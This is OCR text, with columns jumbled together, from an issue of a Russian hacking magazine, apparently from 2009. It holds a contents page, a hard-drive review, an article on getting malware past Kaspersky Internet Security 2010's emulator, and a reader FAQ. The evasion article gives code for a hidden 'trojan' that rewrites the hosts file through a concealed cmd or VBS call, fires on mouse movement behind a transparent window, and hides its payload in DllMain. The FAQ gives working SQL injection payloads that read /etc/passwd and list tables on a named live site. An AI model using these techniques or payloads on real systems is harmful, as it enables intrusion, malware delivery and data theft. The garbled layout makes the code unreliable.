7. Bioyoghurt
(basic cyrillic central european)
В чащах юга жил бы цитрус?—Да,
но фальшивый экземпляр!
Falsches Üben von Xylophonmusik
quält jeden größeren Zwerg
The quick brown fox jumps over the
lazy dog.
Árvíztűrő tükörfúrógép.
Pchnąć w tę łódź jeża lub ośm
skrzyń fig
1234567890
*
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19. журнал от компьютерных хулиганов (000)
автосплойт
создаем инструмент для массрутинга
в локальной сети
инструменты
пентестера
лучший софт для fingerprinting'a
правила
пентеста
аудит по стандарту PCI DSS
вечный да пошел ты,
ботнет SQL!
всегда под контролем как отказаться от SQL баз данных
и выиграть
11
20. содержание Юниксойд
080 Обреченные на успех
Обзор самых интересных проектов,
представленных на unix-конференциях
11 (000) 084 Встраиваем пингвина
Учимся ставить linux на микроконтрол-
леры
КОДИНГ
88 АТАКА НА МИСТЕРА ТВИТТЕРА
Пишем скрипты для спама Twitter на
Python’e
094 ПИТОН ДЛЯ МАТЕРЫХ ХАРДКОР-
ЩИКОВ
Куем ассемблерные вставки в Python с
помощью кошерного CorePy
004 Meganews 032 Базу данных не стащить!
Все новое за последний месяц Правильные способы защитить данные в табли- Фрикинг
цах бд 098 инфракрасная лень
Управлять с пульта можно не только телевизором
Ferrum Взлом
016 Nовый wi-fi 102 Гром и молнии
038 Easy hack Эксперимент по передаче энергии на расстояние
Тест draft n wi-fi роутеров Хакерские секреты простых вещей
Syn/ack
Pc_zone 042 Обзор эксплойтов 106 За семью печатями
020 10 Зло-вирусов Свежие уязвимости от сквоза Win2k8: средства и инструменты безопас-
Самая нашумевшая малварь за послед-
048 Меряем уязвимости ности
ние 10 лет
Классификаторы и метрики компьютерных бре- 110 Узник тайной тюрьмы
026 Навигация без gps шей Используем freebsd jail для изолирования
Как определить свои координаты по ip,
052 Wordpress: небезопасных сервисов
gsm/umts и wi-fi
Тест на проникновение 115 Звездное попурри
030 Когда ты станешь слепым Полный анализ малоизвестных уязвимостей рас- Фокусничаем с ip-pbx asterisk
Это только сейчас кажется, что здоро- крученного движка
вье будет всегда
Юниты
058 Имплантация cisco
Модифицирование прошивки маршрутизатора 120 День зависимости (2009, vhsrip)
Полный ][-гайд по основным ад-
064 Iphone терминатор дикциям
Создаем автоматическое средство аудита apple
iphone 124 Faq united
Большой faq
070 Х-tools
Программы для взлома 127 Диско
8,5 Гб всякой всячины
Сцена 128 www
072 Медиа-магнаты против bittorrent Удобные web-сервисы
Судебный процесс по делу the pirate bay Mebroot
21. Я не забуду никогда
Сравнительный тест винчестеров
объемом не менее 1 Тб
Автор: Алексей Шуваев
Тестер: Евгений Попов
Тестовое оборудование время. Как правило, этот параметр Применение перпендикулярной за- дремлют и на все стороны кричат, что
• Hitachi DeskStar HD721010KLA330 измеряется в миллисекундах или мс писи и еще многих технологий по- их девайс «самый зеленый и эконо-
• Seagate ST31000340AS и составляет порядка 10-20 мс. Чем зволило достичь отличных показате- мичный». Действительно, девайс по-
• Samsung HE103UJ меньше это значение - тем быстрее бу- лей. Как итог – выбором многих поль- казал на удивление высокий уровень
• Western Digital WD10EADS Caviar дет отклик на твой запрос. зователей (да и редакции) уже не раз производительности при низких рабо-
Green Третьим, очень важным, параме- становилась именно эта модель. Ма- чих температурах и небольшой шум-
• Western Digital WD1001FALS Caviar тром, является линейная скорость чте- лое время доступа порадует обладате- ности. Предыдущие модели этой ли-
Black ния и записи информации. От нее за- лей больших архивов с мелкими фай- нейки были собраны на четырех пла-
висит, как быстро ты сможешь сохра- лами: к примеру, музыкальной коллек- стинах, но введение нового техпроцес-
Тестовый стенд нить новый фильм с диска или сколь- ции или многочисленных фотоальбо- са позволило обойтись тремя при рав-
Процессор, МГц: 2200, AMD Athlon 64 ко тебе придется ждать при загрузке мов. Порадовала довольно тихая ра- ном объеме.
3500+(Socket 939) емкой игры. бота девайса (даже при частых запро- Western Digital WD1001FALS Caviar
Системная плата: Albatron K8SLI Hitachi DeskStar HD721010KLA330 сах данных). Black
Память, Мб: 2х512, Corsair Value Select • Цена: 5200 руб. Samsung HE103UJ • Цена: 4600 руб.
DDR-400 • Оценка: 6/10 • Цена: 6500 руб. • Оценка: 8/10
Видео: ASUS EAX1900XTX • Характеристики • Оценка: 7/10 • Характеристики
Системный винчестер, Гб: 80, Seagate • Объем, Гб: 1000 • Характеристики • Объем, Гб: 1000
Barracuda 7200 rpm, IDE • Интерфейс: SATA 300 • Объем, Гб: 1000 • Интерфейс: SATA 300
Блок питания, Вт: 450, Floston • Объем на одну пластину: 200 Гб • Интерфейс: SATA 300 • Объем на одну пластину, Гб: 334
Жесткий диск в роли средства хра- • Скорость вращения, об/мин: 7200 • Объем на одну пластину: 334 Гб • Скорость вращения, об/мин: 7200
нения и накопления информации – по- • Объем кэш памяти, Мб: 32 • Скорость вращения, об/мин: 7200 • Объем кэш памяти, Мб: 32
жалуй, самый производительный и де- • Количество дисков: 5 • Объем кэш памяти, Мб: 32 • Количество дисков: 3
шевый девайс. у многих пользовате- • Количество головок: 10 • Количество дисков: 3 • Количество головок: 6
лей объемы данных, которые необхо- • Поддержка NC Q: есть • Количество головок: 6 • Поддержка NC Q: есть
димо сохранить и обработать, исчисля- • Масса, кг: 0,7 Поддержка NC Q: есть • Масса, кг: 0,69
ются гигабайтами, поэтому винчестер Правоприемником и владельцем заво- • Масса, кг: 0,64 В противовес «зеленому» винчестеру,
емкостью выше 1 Тб уже не является дов IBM по производству жестких дис- Винчестер не для спокойной жизни, WD продвигает линейку производитель-
роскошью, а переходит в разряд необ- ков стала Hitachi. и руководители ком- но для производительной работы. Это ных накопителей. Использование пла-
ходимости. пании сказали: «Одному терабайту видно из тестов и просто при взгляде стин высокой емкости позволило приме-
быть». Инженеры не стали бить рекор- на цену. Гаджет отлично справляется нить при создании всего три блина для
Теоретическая подготовка ды плотности записи и уместили в бок- со своей работой в составе RAID- достижения порога в 1 Тб. Помимо не-
Жесткие диски обладают различны- се девайса сразу 5 пластин по 200 Гб. массивов, будь то небольшой корпора- плохих скоростных показателей, гаджет
ми характеристиками, одна из кото- в этом девайсе нашли место наработки тивный сервер или пользовательское может похвастаться присутствием раз-
рых – емкость. Именно по емкости на- и достижения IBM. Например, рассма- хранилище данных. Широкий модель- личных технологий, позволяющих по-
копителя мы определяем, какое коли- триваемый жесткий диск использует ный ряд жестких дисков емкостью от высить сохранность данных: например,
чество данных можно сохранить. Одна- технологию перпендикулярной запи- 160 до 1000 Гб дает возможность вы- технологией NoTouch, предотвращаю-
ко этот параметр постоянно увеличива- си, которая признана достаточно пер- бирать не только по объему, но и по щей контакт головок с дисками при воз-
ется и зависит напрямую от плотности спективной. к недостаткам можно от- имеющейся в кармане сумме. Гаранти- никновении вибрации. Ну, про сниже-
записи. Измеряется она в битах на ква- нести относительно высокий уровень ей качества также служит время нара- ние шума и прочие технические момен-
дратный дюйм. Но так как мы привыкли температуры. При отсутствии должно- ботки на отказ, заявленное производи- ты можно даже не упоминать. Понрави-
мыслить категориями байтов, то и в ха- го охлаждения это негативно скажется телем, – 1,2 млн. часов. Почти вдвое лись нам и невысокие показатели тем-
рактеристиках указывается именно на сроке жизни девайса. больше стандартных величин! пературы, позволяющие продлить срок
объем хранимых данных. Кроме того, Seagate ST31000340AS Western Digital WD10EADS Caviar Green службы устройства.
ты должен знать, что производители • Цена: 4700 руб. ЛУЧШАЯ ПОКУПКА Итог
частенько хитрят и приравнивают 1 ки- • Оценка: 8/10 • Цена: 4400 руб. Тебе уже не терпится поставить но-
лобайт к 1000 байт, в то время, как 1 • Характеристики • Оценка: 9/10 вый винчестер в системник и запу-
Кб = 1024 б. в связи с этим, порой воз- • Объем, Гб: 1000 • Характеристики стить десяток закачек в торренте? Тог-
никает путаница, когда после формати- • Интерфейс: SATA 300 • Объем, Гб: 1000 да отберем лучшие модели и разда-
рования у тебя «пропадает» несколько • Объем на одну пластину: 250 Мб • Интерфейс: SATA 300 дим награды. Места никогда не
десятков гигабайт. Знай, это упущен- • Скорость вращения, об/мин: 7200 • Объем на одну пластину, Гб: 334 бывает много, поэтому за емкость
ные 24 байта всплывают – а твой вин- • Объем кэш памяти, Мб: 32 • Скорость вращения, об/мин: 7200 и производительность мы награждаем
честер наверняка исправен. • Количество дисков: 4 • Объем кэш памяти, Мб: 32 Seagate ST31500341AS призом «Выбор
Вторым важным параметром яв- • Количество головок: 8 • Количество дисков: 3 pедакции». и поскольку нам также не
ляется время случайного доступа. • Поддержка NC Q: есть • Количество головок: 6 безразлична судьба планеты, и мы ду-
Так как в современных жестких дис- • Масса, кг: 0,64 • Поддержка NC Q: есть маем о будущих поколениях, то приз
ках по-прежнему используется магни- «Золотой терабайт» от Seagate. Мо- • Масса, кг: 0,68 «Лучшая покупка» достается Western
торезистивный способ записи и чте- дель довольно популярна за счет вы- Борьба за спасение экологии нашла Digital WD10EADS Caviar Green.
ния данных, то физическое перемеще- соких скоростных показателей и срав- отклик в стане производителей техни-
ние читающей головки в нужное место нительно небольшой цены. в корпу- ки: сохранять энергию не только не-
диска и чтение информации занимает се разместились 4 блина по 250 Гб. обходимо, но и модно. Маркетологи не
14 15
22. KIS 2010:
версия новая, баги старые
Прежде чем говорить о каких-то багах опасности и автоматически (без запроса к пользо- плане снижения индекса опасности), но остановим- если ее не двигают специально, то, скорее всего, А при переходе по адресу видим следующее: Неоднократно мне приходилось видеть реакцию
и уязвимостях необходимо разобраться в том, где вателю) попадет в слабые ограничения, после че- ся немного еще на одном (cscript) и перейдем к сле- она все равно немного двигается—хотя бы чуть-чуть MOV EDX,ESP // EDX больше не нужен, в него простых пользователей на красный алерт с порося-
мы их будем искать, что именно считать багой, как го можно уже спокойно хозяйничать в системе—ведь дующей технологии. По аналогии с созданием и за- (достаточно проезжающей за окном машины, дви- кладем указатель на вершину стека чьим визгом от продуктов ЛК—нажимали либо «Да»,
работает данный продукт и какая у него философия после определения в группу, анализ активности пуском батника можно сделать запуск такого файла: жения в комнате, лежащей на мышке руки). Поэ- SYSENTER // прощай, немытый WinApi либо первое на что попадет курсор, а более продви-
принятия тех или иных решений. Часто бывает, что приложения в системе практически не проводится on error resume next тому действием от пользователя мы выберем имен- При минимуме инструментов и отсутствии рабоче- нутые пользователи могли при этом поискать знако-
некоторые «неудобности» АВ-компании не признают (мониторятся лишь самые опасные действия), а по- Set FSO—createobject(«scripting. но движение мышью, в VB это можно сделать при- го поисковика можно исследовать sysenter следую- мые буквы в тексте сообщения от антивируса. Шан-
и прикрывают их как угодно—начиная от удаления сему и разговор в статье будет идти как раз об об- filesystemobject») мерно так: щим образом: с помощью отладчика (OllyDbg подой- сы того, что юзер нажмет «Да»—очень высоки, по-
топика на форуме, заканчивая пафосными словами ходе эмулятора, а если быть совсем точным, то речь Set hMyFile—FSO.OpenTextFile(«C:WINDOWS У свежеиспеченной формы устанавливаем для дет) доходим до SYSENTER'a и осматриваемся во- этому достаточно немного поэкспериментировать
«такова политика компании». Но не все так просто— будет идти о способах снижения индекса опасности. system32driversetchosts», 8, false) WindowState значение Maximized, а BorderStyle— круг, точнее смотрим на содержание eax, edx и сте- с файлом—нужно, что бы антивирус что-то спро-
чаще всего, находимые баги, таковыми не являются, hMyFile.WriteLine « # test» None. Этим мы добиваемся разворачивания при за- ка. Использование прямого вызова снижает пример- сил у пользователя. Но на этом приятные моменты
например, какой толк искать баги фаервола Пятая колонна hMyFile.WriteLine «127.0.0.1 www.google.ru # пуске формы на весь монитор. но в 2 раза индекс опасности, но и в такое же коли- не заканчиваются, антивирус дает возможность пу-
у Dr.Web'a, если у него никогда и в помине не На самом деле, наш троян в системе далеко не test» А вот сам код установки прозрачности при загруз- чество раз снижает и вероятность того, что файл во- стить в ход серое вещество и тем, которые ищут зна-
было сетевого экрана? Еще очень популярно одинок, есть те, кто готов ему помогать, причем без- hMyFile.WriteLine « # test « ке формы: обще заработает—на более старых ОСях или более комые буквы на алерте от антивируса—для большей
находить такой псевдо-баг: через Process Explorer возмездно—это системные интерпретаторы. Как это hMyFile.Close Private Sub Form_Load() новых—коды другие, поэтому файл должен перед понятности в алерте изображена иконка приложе-
баловаться с процессами антивируса, а то, что эта ни странно, но это очень живучая технология, кото- Возможно, что это можно сделать более правиль- SetWindowLong Me.hwnd, GWL_EXSTYLE, работой проверять в какой ОСи он находится и ис- ния (о котором вопрошает) и рядышком пишется то,
утилита от Руссиновича добавлена в доверенные рую можно с успехом применять для самых разных но, но свои знания команд я приобрел из просмо- WS_EX_LAYERED пользовать соответствующие коды. что находится в описание файла в версии (Version
приложения даже у самого ленивого антивируса, целей. Для начала рассмотрим ComSpec (cmd.exe). тра когда-то популярных vbs-зловредов, а поэто- SetLayeredWindowAttributes Me.hwnd, 0, 20, Использование прямых вызовов—достаточно риско- Info)—все это можете просмотреть практически
«дыроискателя» совершенно не волнует. с его помощью можно достаточно удобно редактиро- му и использую те способы работы в системе, кото- H2 ванный ход. Во-первых, это очень подозрительная у любой серьезной программы через редактор ре-
Этими двумя небольшими примерами я лишь на- вать файлы, причем способов его вызова достаточно рые в них встречались. в качестве домашнего за- End Sub деятельность с точки зрения антивируса, во-вторых, сурсов. Например, если редактором ресурсов «при-
поминаю читателю о том, что необходимо спер- много, начиная от самого очевидного... дания можете рассмотреть работу с реестром через А вот код для Form_MouseMove: падает стабильность работы приложения—чуть что лепить» все эти «обвесы» от WinRAR'a к маленько-
ва разобраться в технологии/продукте, а не с хо- Создание и запуск bat-файла запуск с параметрами regedt32.exe ;), хотя работу Dim fFile As Integer не так и... му вредному файлу с именем ya_virus.exe, то на за-
ду начинать кидаться тухлыми помидорами в сторо- Примерное содержание batника: с реестром можно реализовать и способами описан- fFile—FreeFile просе к пользовалю будет красоваться иконка архи-
ну какого-то антивируса, тем самым, показывая свое set win333=»%WINDIR%system32drivers ными выше. Open «C:WINDOWSsystem32driversetc РЕ-файлы бывают разные—желтые, зеленые, красные... ватора и надпись «WinRAR archiver» рядом (при этом
полное невежество. Именно поэтому нужно сначала etchosts» Такие файлы набираются индекс опасности при- hosts» For Append As #fFile Зачем зацикливаться на одном единственном фай- имя файла нигде не будет фигурировать).
сделать небольшой ликбез об исследуемой техноло- echo 127.0.0.1 www.google.com # test мерно 12-25. Print #fFile, « # test» ле, который будет выполнять все действия в си- Предлагаю пари: не менее 70% пользователей на
гии и АВ-продукте в общих чертах. %win333% Print #fFile, «127.0.0.1 www.google.ru # test» стеме? Какой-то код можно перенести в dll и вы- такой запрос нажмут «Да» :)
А схема действий такая: Дыра размером с окно Print #fFile, « # test « зывать оттуда функции. Эту библиотеку мож-
Начнем с философии работы продукта CreateFile - WriteFile - CloseHandle - Если приложение отображает GUI и ждет от пользо- Close #fFile но носить с собой двумя способами: извлекать Послесловие
Продукт нацелен на людей, у которых знание ком- ShellExecute (*, *,szBatName, *, *, SW_HIDE) вателя каких-то действий, то ему сходит с рук прак- End из себя и загружать (LoadLibrary) или извлекать Не следует воспринимать эмулятор KIS'a как некую
пьютера стремится к нулю, в народе таких лю- - DeleteFile тически все. Поэтому нужно сделать следующее: Такому файлу KIS дает индекс опасности 3 (из из себя ЕХЕ-файл (загрузчик библиотеки) и би- постоянную во времени и пространстве субстанцию,
дей называют домохозяйками. Сегодня очень мод- Т.е создаем готовый батник, а потом скрыто (ведь форму с кнопкой посередине (при нажатии на кото- 100). Еще немного, и в доверенные бы занес по соб- блиотеку в какую-нибудь папку и запускать за- он не является высеченным на камне и после этого
но все продукты затачивать именно под них и под не обязательно юзеру видеть то, что троян работает, рую происходит редактирование файла hosts) и над- ственной инициативе :) грузчик. в деле размещения кода в dll можно пой- зашитым в антивирус набором правил. Эмулятор об-
геймеров—антивирус должен быть быстрым и мол- глядя на консольное окно, поэтому и SW_HIDE) его пись с просьбой нажать на эту кнопку, после чего на- Если совсем оборзеть, то можно даже не де- ти еще дальше—весь функциональный код поме- новляется также как и базы и не стоит на одном ме-
чаливым, а все остальное отодвигается на второй запускаем и удаляем после отработки. деются на русский «авось», а еще можно после это- лать окно прозрачным. Окно можно сделать черным стить в библиотеку (потенциально опасные дей- сте. Еще сегодня файл мог получать индекс опас-
план. Начиная с 2009 версии эта тенденция наблю- Кроме создания файла и его запуска (все-таки не- го ударится в вычисления вероятности того, что юзер и прикинуть насколько низок будет процент людей ствия), а в самом загрузчике оставить лишь необ- ности 35, а завтра он уже получает 70, но данный
дается и у Антивируса Касперского, если KIS 7 сво- много неуклюжая система) можно запускать cmd.exe нажмет на кнопку...но так мы, конечно, делать не бу- (процента 3), которых напугает вдруг моргнувший ходимое для функционирования. Загрузка библио- процесс иногда происходит и в обратном направле-
им поведенческим анализатором ругался и спраши- с параметрами, в которых передать ему нужные нам дем, а сделаем нечто похожее. Чем отличается вы- экран и они бросятся качать AVZ и выкладывать ло- теки может быть через LoadLibrary непосредствен- нии—индекс опасности может и снижаться. Не ду-
вал о всем, что только можно, независимо от того, команды. Примерно так: шеописанный троян с кнопкой от того, который де- ги на virusinfo.info. Одни примут моргнувший экран но из кода или всю работу можно отдать систем- маю, что все эти методы смогут пофиксить с пер-
что за программа «шалит» в системе, то KIS 8 уже char szCmd[]=»C:windowssystem32cmd. лает все молча, ничего не показывая? Тем, что чело- за проблемы в железе (напряжение скакнуло), дру- ному загрузчику (прописать dll в таблицу импорта, выми обновлениями, если по ним подкрутят прави-
на настройках по умолчанию был куда тише свое- exe»; век его не видит на экране и не делает никаких спе- гие свалят на ОС, а большинство вообще думать ни- причем сделать это можно с помощью разнообраз- ла до более-менее приличного в течение месяца, то
го предшественника. Он даже перестал поросенком char szStr[]=» /c @echo 127.0.0.1 www.google. циальных телодвижений для обеспечения его работы. чего не будет по этому поводу. ных PE-edit'ов и с чужим файлом). это уже будет хорошо. Технологии в продукте зало-
визжать, дабы не расшатывать нервы домохозяй- com C:windowssystem32drivers к нашему приложению должны предъявляться такие Помимо обработки движения мыши можно сделать Но вызов функций из библиотеки—это немного жены очень сложные и серьезные, но «до ума» они
ки, которые и так уже на ладан дышат. Такая скром- etchosts»; же требования, но в тоже время нельзя забывать об обработку еще чего-нибудь другого, самое главное «кричащий» метод, поэтому лучше ничего самому не еще не доведены—сказывается распыление сил раз-
ность со стороны антивируса стала возможна благо- ShellExecute(NULL, NULL, szCmd, szStr, NULL, антивирусе, для которого нужно следующее: должно тут—это дождаться какого-то действия от челове- вызывать, ведь DllMain будет вызвана в любом слу- работчиков и аналитиков на множество задач. Чего
даря Зайцеву Олегу (большинству известен как раз- SW_HIDE); быть окно, действия в системе должны быть только ка, а не помещать весь вредоносный код в функцию чае системным загрузчиком, причем неоднократно. только стоит война патентов в США (см. новости ИТ
работчик AVZ), который вывел эмулятор на доста- После “/с” передаются необходимые команды в ответ на какое-то вмешательство пользователя. Form_Load(). Наверное, все уже поняли в чем идея данного мето- за последние полгода), «окучивание» новых рын-
точно приличный уровень и «заведует» его прави- и опять таки запуск скрыт от глаз пользователя. Кажущаяся трудной на первый взгляд задача на да—достаточно сделать нечто подобное: ков, выпуск новой версии, песочница...
лами. Эмулятор является одной из ключевых пре- Но есть более “ленивый” способ использова- самом деле намного проще: для начала стоит разо- Прощай, немытый WinApi... .if reason == DLL_PROCESS_DETACH На этом греют руки все, начиная от «Скорой ком-
град на пути вредоносного ПО—при первом запу- ния cmd.exe, кто изучал С, тот наверняка помнит браться с окном, а именно сделать так, что бы оно Думаю, что всем известно, что в природе не встре- ...наш_вредоносный_код... пьютерной помощи» и заканчивая антивирусны-
ске он анализирует «в уме» приложение (его дей- об этом: было, но его не видел человек, основных путей два: чается «чистого» CreateFile, он обязательно бу- .endif ми компаниями, поэтому на небольшое «потепление
ствия в системе) и выносит вердикт—разрешать за- char szStr[]=»@echo 127.0.0.1 www.google.com сделать его очень маленьким или сделать его про- дет оканчиваться либо буквой A, либо W, который И эмулятор ничего не заподозрит. рук» хакеров-программистов никто и не обращает
пуск или нет. Приложению присваивается какой-то C:windowssystem32driversetc зрачным настолько, что бы его совсем не было вид- в свою очередь (после того, как разберутся с ко- особого внимания—апельсин большой, всем хватит.
индекс опасности—в зависимости от него приложе- hosts»; но. с действием от пользователя аналогично: оно дировками) вытекают в (Nt)ZwCreateFile, в котором Stupid user
ние попадает в какую-то из групп по ограничению system(szStr); должно быть, но юзер не должен понимать, что он происходит примерно следующее (необходимо учи- Вы помните, на кого ориентирован данный продукт,
действий в системе—в зависимости от того, в какую Но о скрытии консольного окна нужно будет по- специально что-то делает. а чем обычно занимают- тывать, что не у всех ХР): какая у него философия и какого уровня большин-
группу попадает приложение, ему разрешаются те заботиться ДО такого вызова—взять собственное ся за компьютером с точки зрения движения частей MOV EAX,25 // код вызова для ХР ство пользователей? Если нет, то перечитайте ста-
или иные действия в системе. окно и скрыть его. тела в пространстве? Давят на клавиатуру, двигают MOV EDX,7FFE0300 тью с самого начала, а если лень, то прочитайте
Поэтому, основная цель хакера—написать при- Кроме cmd можно использовать и другие интер- мышкой, нажимают на мышке на левую кнопку, ер- CALL [DWORD DS:EDX] // SystemCall— хотя бы название этого подраздела—частично это
ложение, которое получит невысокий индекс претаторы—все они работают достаточно неплохо (в зают на стуле. Но чаще всего двигают мышкой, даже 7C90EB8B ответ на поставленный вопрос.
16 17
23. FAQ:
faq@real.xaker.ru
United
http://host/script.php?Vul=1' and ascii(substring((LOAD_FILE('/etc/ Чтобы облегчить жизнь пользователям, энтузиасты создают стандартные для та-
Q: у меня постоянно не компилируются экплоиты для получения root-прав на Table structure for table `users` passwd')),1,1))=114 - загружается контент; ких систем установочные .cab-файлы, в которых включают предустановленный
*nix-серверах, выдавая всевозможные ошибки. Может, где-то уже есть готовые к за- CREATE TABLE IF NOT EXISTS `users` ( http://host/script.php?Vul=1' and ascii(substring((LOAD_FILE('/etc/passwd')),1,1)) эмулятор Java. в итоге, установка проходит в несколько кликов, и мы получаем
пуску сплоиты? `uid` int(8) NOT NULL AUTO_INCREMENT, between 110 and 115 - загружается контент. Java-приложение и платформу для запуска на своем WM-девайсе. в чем же под-
A: Думаю, не стоит говорить, что сплоит, скомпилированный на сторонней ма- `pass` varchar(30) COLLATE latin1_general_ci DEFAULT NULL, Перенос строки в ASCII - 10. Конец строки - 13. Все манипуляции также можно вох? в том, что для устройства при первом запуске Opera Mini генерируется свой
шине, с большой вероятностью может не выполниться на нужном сервере, а что ... проводить в HEX'e. Длину данных определяем с помощью функции length: идентификационный код, по которому в дальнейшем прокси-сервер (ускоритель
еще хуже – и вовсе «подвесит» систему или вызовет kernel panic (хотя то же са- ) ENGINE=myisam DEFAULT CHARSET=latin1 COLLATE=latin1_general_ci http://host/script.php?Vul=1' and substring(length(LOAD_FILE('/etc/ и сжималка трафика) Оперы «узнает» телефон. Баг в том, что такой сгенериро-
мое возможно, даже если ты скомпилил эксп на самом сервере). Поэтому всегда AUTO_INCREMENT=10 ; passwd')),1,1)='4 ванный код вместе с эмулятором попал и в используемую для установки сбор-
полезно читать комментарии автора эксплоита, оставленные в исходнике. Если Нужная нам кодировка - latin1, конечный запрос: host/script.php?Id=10 union http://host/script.php?Vul=1' and substring(length(LOAD_FILE('/etc/ ку. а поскольку ею воспользовался не только ты, нет ничего удивительного, что
на все вышесказанное тебе забить, то смело топай по адресу http://jshooter. select 1,2,convert(pass using latin1) from users passwd')),2,1)='8 для сервера Opera Mini вы являетесь одним и тем же пользователем. с одинако-
by.ru/xpl. Там ты найдешь такие известные сплоиты, как brk, h00lyshit, ptrace, 3. Включена фильтрация кавычек. Для обхода этого ограничения «чарим» ... выми кукисами.
mremap, raptor и многие другие. Само собой, все эти отмычки ты должен ис- (функция char(ASCII-код_символа)) каждый символ и объединяем с помощью Так, мы можем посимвольно прочесть какие-либо конфиги с паролями внутри.
пользовать только на своем сервере :). оператора конкатенации в MS Sql – «+». Получаем строку вроде char(108)+char Метод крайне неудобный и долгий, логи распухнут до немалых размеров, но, Q: Говорят, мобильные операторы запустили мобильный чат. Что это и как попробо-
(111)+char(103)+char(105)+char(110)+char(115). Но если выполнить запрос, то если другого выхода нет, то выбирать не приходится. вать?
Q: Существует ли возможность быстро, программными средствами уничтожить содер- мы также получим синтаксическую ошибку, так как символ «+» в гет-запросах Аналогично можно использовать into_outfile, записав произвольные данные A: Действительно, в апреле «главная тройка» операторов запустила, наконец-
жимое жесткого диска в экстренных ситуациях? воспринимается как пробел. Поэтому переводим его с помощью любой Url в файл (не забывай, что может помешать фильтрация кавычек, и необходимы то, услугу «чат». Еще бы: у каждого, кто этим чатом может пользоваться, дав-
A: На практике сам я еще не испытывал, но существует так называемый Darik's Encoding/Decoding утилиты в значение %2B. в итоге, запрос принимает вид: права для записи + полный путь к директории). но установлена мобильная аська. Почему бы не использовать стандартные
Boot and Nuke - система для быстрого удаления информации с жестких дисков. Http://localcareers.com/seekers/articles/profile.cfm?Author_ID=9 or 1=(SELECT Пример эксплоита, использующего load_file - http://milw0rm.com/ возможности системы, тем более, бесплатно? До первого июля проводится
Записываешь iso'шник на CD или floppy, вставляешь при следующей загрузке TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME exploits/5639. ASCII таблицу можно посмотреть здесь: http://goascii.com. бета-тестирование, поэтому платы никто с тебя не возьмет. Настройки:
в дисковод – и все. Есть возможность выбора создавать такой диск для стирания NOT IN (char(108)%2Bchar(111)%2Bchar(103)%2Bchar(105)%2Bchar(110)%2Bc 9. Полагаю, уже многие наслышаны о новом методе, но на практике мало что Megafon (http://www.megafoncenter.ru/klg/service/special/chat);
Windows-систем или Linux. har(115)))-- удается получить с помощью этой процедуры, так как слишком многое зависит МТС (http://www.mts.ru/news/2009-04-10-1007983);
В тексте ошибки будет присутствовать название следующей таблицы. от того, как выводит данные из базы уязвимый сценарий. в большинстве случа- Beeline (http://mobile.beeline.ru/kaluga/services/service.wbp?Id=949478c3-c447-
Q: Пишу Security-анализатор php-скриптов, можешь подсказать примеры уже состав- 4. Отличия от слепой инъекции в mysql только в названиях функций, принци- ев мы либо вообще не увидим вывода, либо увидим всевозможные ошибки. Од- 4ffc-bf50-05a342ee9699).
ленных регулярок для поиска известных багов? пы одинаковые. Для примера, есть хост с данной багой, вывод, соответствен- нажды mysql выплюнул мне целый ряд ошибок, в тексте которых были указа-
A: Подобный сканер написан командой acid root – и, соответственно, примеры но, отсутствует: ны столбцы: Q: Как посмотреть всех клиентов, которые в данный момент используют wifi-сети?
их регэкспов: Http://host/script.asp?ID=1' ... A: Способов несколько:
$regex[] = array('TYPE' = 'fopen vuln','LEVEL' = '3','REGEX' = «/ Сравниваем ASCII-код первого символа строки, выдаваемого подзапросом: Warning: mysql_result() [function.mysql-result]: NAME not found in mysql result 1. Если есть доступ к админке точки доступа, то практически на любой прошив-
fopen$space((.*)$userdat(.*))/i»); Http://host/script.asp?ID=1 and 1=IIF(asc(mid((select last(userid) from index 19 in /var/www/virtual/host.com/htdocs/news/news.php on line 19 ке девайса есть вкладка со всеми текущими подключениями, где отображает-
$regex[] = array('TYPE' = 'crlf injection','LEVEL' = '1','REGEX' = «/ users),1,1))=104,1,0) Warning: mysql_result() [function.mysql-result]: LOGIN not found in mysql result ся MAC.
mail$space((.*)$userdat(.*))/i»); Если код совпадает, то функция IIF возвращает 1 и логическое выражение «1 index 19 in /var/www/virtual/host.com/htdocs/news/news.php on line 21 2. На AP практически всегда используется DHCP-сервер, который выдает клиен-
$regex[] = array('TYPE' = 'cross site scripting','LEVEL' = '1','REGEX' = and 1=1» верно - происходит загрузка динамического содержимого сайта. Ес- ... там IP-адреса из определенного диапазона. Достаточно просканировать любым
«/?=$space(.*)$userdat/i»); ли совпадения не происходит, то, как правило, загружается только шаблон сай- Теперь на примере. Есть инъекция с выводом первого столбца - http://host/ сканнером (Angry IP Scanner, www.angryziber.com - к примеру) этот диапазон,
$regex[] = array('TYPE' = 'cross site scripting','LEVEL' = '1','REGEX' = та. Значит, подставляем другой ASCII-код и т.д. Справка по функциям MS Access script.php?Vul=1 union select 1,2,3. Смотрим http://host/script.php?Vul=1 чтобы определить «живые хосты».
«/(print|echo|print_r|var_dump)$space(|(|»)(.*)$userdat/i»); расположена здесь - http://www.techonthenet.com/access/functions/index_alpha. PROCEDURE ANALYSE() - jonas_chalk.article.title. 3. Замечательная программа kismet (www.kismetwireless.net) содержит такую
Смотри скрипты на диске. php. Здесь jonas_chalk - имя текущей БД, article – таблица, из которой идет вы- функцию по умолчанию.
5. Используй 16-ричные значения символов. Если мы хотим получить простой борка изначально, title - первый столбец. Получаем второй столбец с помо-
Q: Скопился целый ряд вопросов по sql-инъекциям: алерт на выходе, то строка scriptalert()/script в hex будет выглядеть так: щью limit - http://host/script.php?Vul=1 limit 1,1 PROCEDURE ANALYSE() - Q: Хочу сделать следующую вещь: чтобы при выделении слова в любом приложении
1. Есть стандартная sql-injection, подобрал количество столбцов, но когда делаю 0x3c7363726970743e616c65727428293c2f7363726970743e, и конечный запрос jonas_chalk.article.question. Изменяя значение первого аргумента limit, получа- можно было нажать на горячую клавишу – и это слово отправлялось в поисковик или
union select, сервер выдает «Not Acceptable». «-1 union select 1,2,0x3c7363726970743e616c65727428293c2f7363726970743e». ем все столбцы. онлайн-переводчик. Для примера, в Google. Как это проще всего реализовать (уж боль-
2. Что делать, если вместо вывода нужных полей получаю Illegal mix of collations 6. в журнале(][ # 111) не так давно была статья на тему раскручивания слож- Для тех, кто не понял - мы можем получить название и столбцы только но не хочется писать специальное приложение)?
for operation 'UNION'? ных blind sql-injection без использования benchmark. Вкратце опишу, о чем той таблицы, откуда идет выборка изначально. Более подробную информа- A: в такой ситуации сам Бог велел воспользоваться замечательной тулзой
